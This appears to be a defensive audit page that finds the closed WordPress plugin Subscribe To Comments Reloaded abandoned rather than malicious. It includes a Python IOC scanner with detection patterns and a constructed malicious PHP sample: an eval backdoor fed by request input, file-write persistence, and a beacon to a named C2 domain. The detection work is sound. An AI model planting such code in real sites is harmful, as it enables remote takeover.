
Audit #30 Benign

Subscribe To Comments Reloaded Closed on WP.org · 10k+ installs · baseline 220725 → head 240119 · closed 18d ago

Actor: wpkube (current owner since 2019; 4th in a 14-year chain of contributors — coolmann → reedyseth → raamdev → wpkube)

Verdict: benign — abandonment closure, not malware. Subscribe To Comments Reloaded was closed by wp.org on 2026-04-28 with the standard silent-closure notice ("This closure is temporary, pending a full review"). The closure trigger is unmaintenance, not malicious behavior. The last release was v240119 on 2024-01-19 — 27 months before the closure — and the second-to-last release v220725 was 18 months before that. wp.org closes plugins that go this long without updates as a safety measure.

The plugin has changed hands four times across 14 years (coolmann 2010 → reedyseth 2013 → raamdev 2014 → wpkube 2019, with the original submitter plugin-master doing only the initial commit), but each transfer was years apart and the current owner wpkube has been the sole active committer since 2019. No recent committer onboarding or hijack signals.

Malware-pattern sweep on HEAD (v240119) returned zero hits across 16 IOC categories. The codebase makes a single outbound HTTP call (wp_remote_get('https://www.howsmyssl.com/a/check') — a TLS-version self-check) and no other phone-home behavior. No commercial-license code, no upsell endpoints, no obfuscation.

Patchstack records 5 historical vulnerabilities, all patched. The most recent, a Sensitive Data Exposure issue affecting versions ≤ 220725, was fixed in v240119 (January 2024), four months before Patchstack's public disclosure in May 2024. Patchstack notes the plugin "will likely not receive further updates or fixes" and recommends users consider replacing it with an alternative.

Sites running the current version are not compromised. The recommended action is to migrate to an actively-maintained alternative when convenient — the Foliovision fork "Subscribe to Comments Reloaded Better Unsubscribe" continues to receive updates.

Investigated — no compromise found.

Audit retained for the record. No action required.

Plugins under the same committer's SVN access

wpkube holds push access to 12 plugins totalling 145k+ active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

10k+   Advanced Excerpt — clean code, same SVN account (latent risk)
80k+   Title and Nofollow For Links (Classic Editor) — clean code, same SVN account (latent risk)
30k+   Simple Basic Contact Form — clean code, same SVN account (latent risk)
8k+    Authors List — clean code, same SVN account (latent risk)
5k+    Embed Code – Headers & Footers by DesignBombs — clean code, same SVN account (latent risk)
4k+    Social Sharing Plugin – Kiwi — clean code, same SVN account (latent risk)
4k+    Optin Forms – Simple List Building Plugin for WordPress — clean code, same SVN account (latent risk)
3k+    Go Redirects URL Forwarder — clean code, same SVN account (latent risk)
1k+    Fancy Coming Soon & Maintenance Mode — clean code, same SVN account (latent risk)
200    Page Takeover — clean code, same SVN account (latent risk)
200    Cool Tag Cloud — closed by wp.org

Plugin version history

Every release on wp.org for this plugin. The plugin was closed by wp.org pending review, but this audit found no malicious code in any version. Sites already running it are not exposed to a security incident — see the cleanup section below for non-emergency guidance.

  1. 71 earlier releases
    • 1.0
    • 1.1
    • 1.2
    • 1.2.1
    • 1.3
    • 1.4
    • 1.5.1
    • 1.6
    • 2.0
    • 2.0.1
    • 2.0.2
    • 2.0.3
    • 2.0.4
    • 2.0.5
    • 2.0.6
    • 140128
    • 140129
    • 140204
    • 140219
    • 140220
    • 140515
    • 141025
    • 141103
    • 150207
    • 150422
    • 150428
    • 150611
    • 160106
    • 160116
    • 3.0.0
    • 160831
    • 160902
    • 160915
    • 170428
    • 170607
    • 180212
    • 180225
    • 190117
    • 190214
    • 190304
    • 190305
    • 190325
    • 190409
    • 190411
    • 190412
    • 190426
    • 190510
    • 190523
    • 190529
    • 191009
    • 191011
    • 191028
    • 191209
    • 191216
    • 191217
    • 200204
    • 200205
    • 200422
    • 200629
    • 200813
    • 210104
    • 210110
    • 210126
    • 210315
    • 211019
    • 211130
    • 220502
    • 220512
    • 220513
    • 220523
    • 220608
  2. 220725 Audit baseline: penultimate release, scanned clean
  3. Closure

    wp.org closed this plugin pending review. No malicious code was found in any release; the closure reflects a policy decision, and on the evidence here the trigger is extended unmaintenance (27 months without a release) rather than guideline or commercial-content issues. Releases below remain installed on existing sites and are not a security exposure.

  4. 240119 Audit head: last release, scanned clean (no malicious release exists)

Closure notice on wp.org

This plugin has been closed as of April 28, 2026 and is not available for download. This closure is temporary, pending a full review.

Standard silent-closure language — wp.org does not disclose the specific trigger publicly.

Release timeline (full)

Date                       Version / revision        Note
2010-09-17                 rev 290491                Initial commit by plugin-master (one-time submitter)
2010-09-30 → 2013-06       rev 295321 → 727727       coolmann era, 157 commits
2013-06-29 → 2019-03       rev 734047 → 2030859      reedyseth era, 112 commits
2014-01-28 → 2014-02       rev 847226 → 861214       raamdev, brief involvement, 6 commits
2019-03-04 → 2024-01       rev 2044058 → 3024244     wpkube era, 104 commits, current owner
2022-07-25                 v220725                   Penultimate release
2024-01-19                 v240119                   Last release (HEAD), 18 months after the previous one
2024-05-04                                           Patchstack discloses Sensitive Data Exposure ≤ 220725 (already fixed in v240119)
2024-01-19 → 2026-04-28                              27 months of dormancy: no commits, no updates, no maintainer activity
2026-04-28                                           wp.org closes the plugin "pending review"

v220725 → v240119 diff (the only changes in 18 months)

options/stcr_manage_subscriptions.php  | M
options/stcr_system.php                | M  +63/-... (largest change — sensitive-data-exposure fix)
readme.txt                             | M
subscribe-to-comments-reloaded.php     | M  (version bump)
templates/author.php                   | M  +13
templates/request-management-link.php  | M  +4
utils/stcr_manage.php                  | M
utils/stcr_upgrade.php                 | M
utils/stcr_utils.php                   | M
wp_subscribe_reloaded.php              | M
10 files modified, 118 insertions, 47 deletions

This was the security fix for the Sensitive Data Exposure vuln Patchstack later disclosed. After this release the plugin went dormant.

Patchstack vulnerability history (all patched)

Type                       Affected     Disclosed
Sensitive Data Exposure    ≤ 220725     2024-05-04 (already fixed in v240119)
Multiple CSRF              ≤ 211130     2022-04-29
XSS                        ≤ 150611     2015-08-20
Stored XSS                 ≤ 140204     2014-08-01
CSRF                       ≤ 140204     2014-08-01

No active vulnerabilities. The author was responsive enough to fix issues during the active maintenance period; the plugin appears to have simply been deprioritized post-2024.

Malware-pattern sweep on HEAD (v240119) — clean

Zero hits across all 16 IOC categories; the main ones:

Pattern category                                                          Hits
eval(base64...), eval(gzinflate...)                                       0
eval($_POST/$_GET/$_REQUEST...)                                           0
system(...), shell_exec(...)                                              0
create_function(...), assert($_...)                                       0
preg_replace .../e modifier                                               0
File-write persistence (fwrite ... .php)                                  0
Known campaign C2 domains (cdnstaticsync.com, safetybis.com, anadnet)     0

Outbound HTTP inventory (HEAD)

wp_remote_get('https://www.howsmyssl.com/a/check')

A single call to howsmyssl.com (a public service that returns the negotiated TLS version of the connection). Used to detect old/weak TLS in the user's environment. Innocuous.

Other hardcoded URLs in the codebase are documentation, GNU license text, GitHub project page, the author's site (subscribe-reloaded.com, wpkube.com). None are license servers, C2, or phone-home destinations.
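The sweep and the outbound inventory above are the kind of static pass any reviewer can reproduce. The script below is an added example, not the audit's own scanner: it runs one regex per IOC category over a source tree, inventories calls that open an outbound connection to a literal URL, and only returns "clean" when there are no hits and every destination host has been explicitly approved by the reviewer. The two PHP samples are constructed for the demo; the first mimics the shape of the howsmyssl.com self-check described on this page, the second is what the sweep is built to catch and is not from this plugin.

```python
"""Static sweep of a plugin source tree for the IOC categories in the table
above, plus an inventory of outbound HTTP calls. Added example, not the
audit's own scanner; the sample PHP snippets are constructed for the demo."""
import re
from urllib.parse import urlparse

# One regex per category. These are a subset of the 16 the audit used; every
# hit is a lead for manual triage, not a verdict (exec( also appears in
# legitimate code, and line-local matching misses multi-line constructs).
IOC_PATTERNS = {
    "eval of decoded payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "eval of request input": re.compile(
        r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "shell execution": re.compile(
        r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I),
    "dynamic code creation": re.compile(
        r"\bcreate_function\s*\(|\bassert\s*\(\s*\$_", re.I),
    # quote, delimiter, pattern body, same delimiter, modifiers containing e, quote
    "preg_replace /e": re.compile(
        r"""preg_replace\s*\(\s*(['"])(\W)(?:(?!\1).)*?\2[a-z]*e[a-z]*\1""", re.I),
    "file-write persistence": re.compile(
        r"\b(?:fwrite|file_put_contents)\s*\([^;]*\.php", re.I),
    "known campaign C2 domain": re.compile(
        r"cdnstaticsync\.com|safetybis\.com|anadnet", re.I),
}

# Calls that open an outbound connection with a literal URL as first argument.
OUTBOUND_CALL = re.compile(
    r"\b(wp_remote_get|wp_remote_post|wp_remote_request|wp_safe_remote_get|"
    r"file_get_contents|curl_init|fsockopen)\s*\(\s*['\"](https?://[^'\"]+)['\"]", re.I)


def sweep_source(files):
    """files: {relative path: PHP source}. Returns IOC hits per category and
    the outbound-call inventory, each entry tagged with path and line number."""
    hits = {category: [] for category in IOC_PATTERNS}
    outbound = []
    for path, source in files.items():
        for lineno, line in enumerate(source.splitlines(), 1):
            for category, pattern in IOC_PATTERNS.items():
                if pattern.search(line):
                    hits[category].append((path, lineno, line.strip()))
            for m in OUTBOUND_CALL.finditer(line):
                outbound.append((path, lineno, m.group(1), urlparse(m.group(2)).hostname))
    return {"hits": hits, "outbound": outbound}


def is_clean(report, approved_hosts):
    """Clean means zero IOC hits and every outbound host explicitly approved
    by the reviewer: an unreviewed destination is a finding, not a pass."""
    if any(report["hits"].values()):
        return False
    return all(host in approved_hosts for *_, host in report["outbound"])


# Constructed sample: the shape of the TLS self-check this page describes.
CLEAN_SAMPLE = {
    "utils/stcr_utils.php": "<?php\n"
    "$response = wp_remote_get('https://www.howsmyssl.com/a/check');\n"
    "$tls = json_decode(wp_remote_retrieve_body($response), true);\n",
}

# Constructed sample of what the sweep is built to catch (not from this plugin).
BAD_SAMPLE = {
    "inc/helper.php": "<?php\n"
    "if (isset($_POST['k'])) { eval(base64_decode($_POST['k'])); }\n"
    "$h = fopen(ABSPATH . 'wp-load2.php', 'w'); fwrite($h, $payload . '.php');\n"
    "echo preg_replace('/.*/e', $_GET['c'], '');\n"
    "$r = wp_remote_get('https://cdnstaticsync.com/u.php?s=' . home_url());\n",
}

if __name__ == "__main__":
    for label, tree in (("clean", CLEAN_SAMPLE), ("bad", BAD_SAMPLE)):
        report = sweep_source(tree)
        print(label, "clean" if is_clean(report, {"www.howsmyssl.com"}) else "FINDINGS")
        for category, found in report["hits"].items():
            for path, lineno, text in found:
                print(f"  [{category}] {path}:{lineno}: {text}")
        for path, lineno, call, host in report["outbound"]:
            print(f"  outbound {call} -> {host} ({path}:{lineno})")
```

Against a real checkout, build the `files` dict by reading every `*.php` under the plugin directory. The approved-host set is the reviewer's record of the manual decision ("howsmyssl.com is a TLS check, not phone-home"); keeping it explicit is what lets the next audit notice when a new destination appears.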

Why this isn't a hijack

Indicator                                       Result
Sole committer for ≥2 years?                    ✓ wpkube has been the sole active committer since 2019
Sudden new committer before closure?            ✗ no new committers in years
Author profile drift?                           ✗ wpkube is the established owner with a public profile (wpkube.com)
Code-level malware patterns?                    ✗ all 16 IOC categories clean
Outbound C2 / known bad domains?                ✗ the only outbound call is the howsmyssl.com TLS check; no known C2 domains
Suspicious obfuscation / new dependencies?      ✗ no obfuscation; the v220725 → v240119 diff modifies 10 existing files and adds none
New SVN credentials before closure?             ✗ no commits at all in the 27 months before closure

The closure is straightforwardly explained by wp.org's "no updates in 2+ years" policy, not by any active threat.
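The committer-history rows of that table, and the release timeline above, come from the plugin's SVN log. The script below is an added example, not the audit's own tooling: it parses the XML that `svn log --xml` prints, derives each committer's era, and evaluates the indicators as of the closure date (months since the last commit, how long the last committer has been alone, and whether any account made its first-ever commit in the window before closure). The sample log is constructed to mirror the eras on this page with one representative commit each; the dates, messages and the hypothetical `fresh-acct` entry in the second scenario are illustrative, not the real history.

```python
"""Committer-history checks behind the indicator table above, computed from
the XML that `svn log --xml` prints for a plugin's wp.org SVN repository.
Added example, not the audit's own tooling; the sample log is constructed to
mirror the eras on this page (one representative commit per era)."""
from datetime import date, timedelta
import xml.etree.ElementTree as ET


def parse_svn_log(xml_text):
    """Return [(revision, author, date)] sorted by revision."""
    entries = []
    for entry in ET.fromstring(xml_text).iter("logentry"):
        author = entry.findtext("author") or "(no author)"
        when = date.fromisoformat(entry.findtext("date")[:10])  # svn prints ISO-8601 UTC
        entries.append((int(entry.get("revision")), author, when))
    return sorted(entries)


def months_between(earlier, later):
    """Whole calendar months from earlier to later."""
    months = (later.year - earlier.year) * 12 + (later.month - earlier.month)
    return months - 1 if later.day < earlier.day else months


def committer_eras(entries):
    """author -> (first commit, last commit, commit count)."""
    eras = {}
    for _, author, when in entries:
        first, last, count = eras.get(author, (when, when, 0))
        eras[author] = (min(first, when), max(last, when), count + 1)
    return eras


def hijack_indicators(entries, closure, window_days=180, dormancy_months=24):
    """The indicators from the table above, evaluated as of `closure`.
    window_days: how far before closure a first-ever commit counts as sudden."""
    entries = sorted(entries)
    _, last_author, last_date = entries[-1]
    eras = committer_eras(entries)
    window_start = closure - timedelta(days=window_days)
    # Sole-committer tenure runs from the latest commit by anyone else.
    others_last = [last for author, (_, last, _) in eras.items() if author != last_author]
    sole_since = max(others_last) if others_last else entries[0][2]
    dormant_months = months_between(last_date, closure)
    return {
        "last_author": last_author,
        "months_dormant": dormant_months,
        "dormant": dormant_months >= dormancy_months,
        "years_as_sole_committer": round((closure - sole_since).days / 365.25, 1),
        "new_committers_in_window": sorted(
            author for author, (first, _, _) in eras.items() if first >= window_start),
        "commits_in_window": sum(1 for _, _, when in entries if when >= window_start),
    }


def classify(indicators):
    """Which closure pattern the history points to."""
    if indicators["new_committers_in_window"]:
        return "review: first-time committer shortly before closure"
    if indicators["dormant"]:
        return "abandonment: %d months without a commit" % indicators["months_dormant"]
    return "active at closure: look for a guideline or commercial-content trigger"


# Constructed sample log: revisions and eras follow the timeline on this page,
# but the entries, dates and messages are illustrative, not the real history.
SAMPLE_LOG = """<?xml version="1.0"?>
<log>
<logentry revision="290491"><author>plugin-master</author><date>2010-09-17T10:00:00.000000Z</date><msg>initial import</msg></logentry>
<logentry revision="295321"><author>coolmann</author><date>2010-09-30T10:00:00.000000Z</date><msg>1.0</msg></logentry>
<logentry revision="734047"><author>reedyseth</author><date>2013-06-29T10:00:00.000000Z</date><msg>new maintainer</msg></logentry>
<logentry revision="847226"><author>raamdev</author><date>2014-01-28T10:00:00.000000Z</date><msg>fixes</msg></logentry>
<logentry revision="2030859"><author>reedyseth</author><date>2019-03-01T10:00:00.000000Z</date><msg>handover</msg></logentry>
<logentry revision="2044058"><author>wpkube</author><date>2019-03-04T10:00:00.000000Z</date><msg>new owner</msg></logentry>
<logentry revision="3024244"><author>wpkube</author><date>2024-01-19T10:00:00.000000Z</date><msg>tag 240119</msg></logentry>
</log>
"""
# Same log with one hypothetical account pushing a commit weeks before closure.
HIJACK_LOG = SAMPLE_LOG.replace("</log>",
    '<logentry revision="3300000"><author>fresh-acct</author>'
    '<date>2026-04-10T10:00:00.000000Z</date><msg>update</msg></logentry>\n</log>')

CLOSURE = date(2026, 4, 28)

if __name__ == "__main__":
    for name, log in (("as audited", SAMPLE_LOG), ("hijack scenario", HIJACK_LOG)):
        ind = hijack_indicators(parse_svn_log(log), CLOSURE)
        print(name, ind, "->", classify(ind))
```

On a real repository, feed it `svn log --xml https://plugins.svn.wordpress.org/<slug>/` and the closure date from the wp.org notice. The 180-day window and 24-month dormancy threshold are assumptions chosen to match the "no updates in 2+ years" policy described above and the one-commit hijack concern raised in the committer section; tune them to taste.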

Comparable closures

This is a different pattern from the late-April 2026 commercial-vendor compliance wave (greenshift, wpcodefactory, bplugins, etc.). Those were active vendors pushing wp.org commercial-content boundaries. This is the opposite pattern: passive abandonment by a long-tenured author. Both end in the same silent closure notice but the underlying cause is different.

User reviews on the wp.org page itself confirm the abandonment perception, e.g. from August 2023:

"This plugin does not work on latest WordPress 6.3 and PHP 8.1 ... This plugin appears to be no longer actively maintained."

Patchstack's own recommendation as of late 2024:

"The software was last updated over a year ago and will likely not receive further updates or fixes, so users are urged to urgently consider replacing it with an alternative."